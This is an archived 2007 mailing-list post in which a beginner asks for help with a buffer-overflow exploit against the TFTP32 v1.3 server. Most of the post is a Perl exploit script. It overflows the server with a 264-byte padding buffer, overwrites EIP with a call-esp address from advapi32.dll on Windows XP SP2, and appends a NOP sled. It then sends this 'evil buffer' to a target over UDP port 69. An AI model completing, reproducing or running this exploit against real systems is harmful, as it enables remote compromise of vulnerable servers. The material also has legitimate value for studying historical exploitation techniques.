Vulnerability Development mailing list archives

Help needed in TFTP32v1.3 BO

From: wong yu liang <yuliang11 () yahoo com>
Date: Tue, 16 Oct 2007 22:53:53 -0700 (PDT)




hi all, 
  i'm new to bufferoverflow. i've gone thru some basic
examples in bufferover now i'm trying to write my own
exploit based on this software. basically i found this
perl script somewhere on the net. it takes 264 bytes
to overflow with 4 byte extra for the EIP.
  i''m using call esp ,  #0x77e2d9d3 advapi32.dll
winxp  sp2 for the RET and i found that i'm still 4
bytes off when i dump the esp register in ollydbg.
i've some examples on the net like "add esp 10, ret 4"
, but i'm not sure what it means.
help someone can enlighten me on this. thanks 


use IO::Socket;
$host = "10.10.10.2";#Target IP here
$port = "69";#Target Port Here. TFTP uses udp 69

#0x77e2d9d3 advapi32.dll
$shellcode="\xd3\xd9\xe2\x77";


$shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#NOPS
$shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#NOPS
$shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#NOPS
$shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#NOPS
$shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#NOPS
$shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#NOPS
$shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#NOPS
$shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#NOPS
$shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#NOPS
$shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#NOPS
 136


$buf ="\x00\x02";
$buf .= "\x41" x 264;


$buf .= $shellcode;


#Print size of buffer
print "Length: ", length($buf), "\n";

#Try to create socket
$socket = IO::Socket::INET->new(Proto => "udp") or die
"Cannot Create Socket:
$@\n";
$ipaddr = inet_aton($host) || $host;
$portaddr = sockaddr_in($port, $ipaddr);

#Send our evil buffer
send($socket, $buf, 0, $portaddr) == length($buf) or
die "Cannot Send Buffer:
$!\n";
print "All Done\n";


       
____________________________________________________________________________________
Be a better Heartthrob. Get better relationship answers from someone who knows. Yahoo! Answers - Check it out. 
http://answers.yahoo.com/dir/?link=list&sid=396545433

Current thread:

Help needed in TFTP32v1.3 BO wong yu liang (Oct 17)
- <Possible follow-ups>
- Re: Help needed in TFTP32v1.3 BO wong yu liang (Oct 23)